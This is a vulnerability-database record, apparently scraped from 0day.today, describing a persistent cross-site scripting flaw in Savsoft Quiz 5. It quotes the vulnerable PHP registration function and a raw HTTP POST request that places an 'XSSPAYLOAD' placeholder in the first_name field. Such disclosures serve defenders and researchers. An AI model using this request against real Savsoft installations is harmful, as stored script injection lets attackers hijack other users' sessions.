DATABASE RESOURCES PRICING ABOUT US

{"id": "1337DAY-ID-34664", "type": "zdt", "bulletinFamily": "exploit", "title": "Savsoft Quiz 5 - Persistent Cross-Site Scripting Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2020-07-10T00:00:00", "modified": "2020-07-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/34664", "reporter": "th3d1gger", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2020-07-19T17:56:46", "viewCount": 120, "enchantments": {"dependencies": {}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "sourceHref": "https://0day.today/exploit/34664", "sourceData": "# Exploit Title: Savsoft Quiz 5 - Persistent Cross-Site Scripting\r\n# Exploit Author: Ogulcan Unveren(th3d1gger)\r\n# Vendor Homepage: https://savsoftquiz.com/\r\n# Software Link: https://github.com/savsofts/savsoftquiz_v5.git\r\n# Version: 5.0\r\n# Tested on: Kali Linux\r\n\r\n---Vulnerable Source Code----\r\n function insert_user_2(){\r\n\r\n\t\t$userdata=array(\r\n\t\t'email'=>$this->input->post('email'),\r\n\t\t'password'=>md5($this->input->post('password')),\r\n\t\t'first_name'=>$this->input->post('first_name'),\r\n\t\t'last_name'=>$this->input->post('last_name'),\r\n\t\t'contact_no'=>$this->input->post('contact_no'),\r\n\t\t'gid'=>implode(',',$this->input->post('gid')),\r\n\t\t'su'=>'2'\r\n\t\t);\r\n\t\t$veri_code=rand('1111','9999');\r\n\t\t if($this->config->item('verify_email')){\r\n\t\t\t$userdata['verify_code']=$veri_code;\r\n\t\t }\r\n\t\t \t\tif($this->session->userdata('logged_in_raw')){\r\n\t\t\t\t\t$userraw=$this->session->userdata('logged_in_raw');\r\n\t\t\t\t\t$userraw_uid=$userraw['uid'];\r\n\t\t\t\t\t$this->db->where('uid',$userraw_uid);\r\n\t\t\t\t$rresult=$this->db->update('savsoft_users',$userdata);\r\n\t\t\t\tif($this->session->userdata('logged_in_raw')){\r\n\t\t\t\t$this->session->unset_userdata('logged_in_raw');\r\n\t\t\t\t}\r\n\t\t\t\t}else{\r\n\r\n\t\t$rresult=$this->db->insert('savsoft_users',$userdata);\r\n\t\t$uid=$this->db->insert_id();\r\n\t\tforeach($_POST['custom'] as $ck => $cv){\r\n\t\t\tif($cv != ''){\r\n\t\t$savsoft_users_custom=array(\r\n\t\t'field_id'=>$ck,\r\n\t\t'uid'=>$uid,\r\n\t\t'field_values'=>$cv\r\n\t\t);\r\n\t\t$this->db->insert('savsoft_users_custom',$savsoft_users_custom);\r\n\t\t\t}\r\n\t\t}\r\n\r\n\r\n\r\n\r\n----Vulnerable Request---\r\nPOST /index.php/login/insert_user/ HTTP/1.1\r\nHost: savsoftquiz_v5\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://192.168.1.2/index.php/login/registration/\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 231\r\nConnection: close\r\nCookie: ci_session=0lhlr1iv1qgru1u1kmg42lbvj8mprokv\r\nUpgrade-Insecure-Requests: 1\r\n\r\nemail=hello%40gmail.com&password=password&first_name=XSSPAYLOAD&last_name=test&contact_no=05785555555&gid%5B%5D=1\n\n# 0day.today [2020-07-19] #", "_state": {"dependencies": 1645755294}}

{}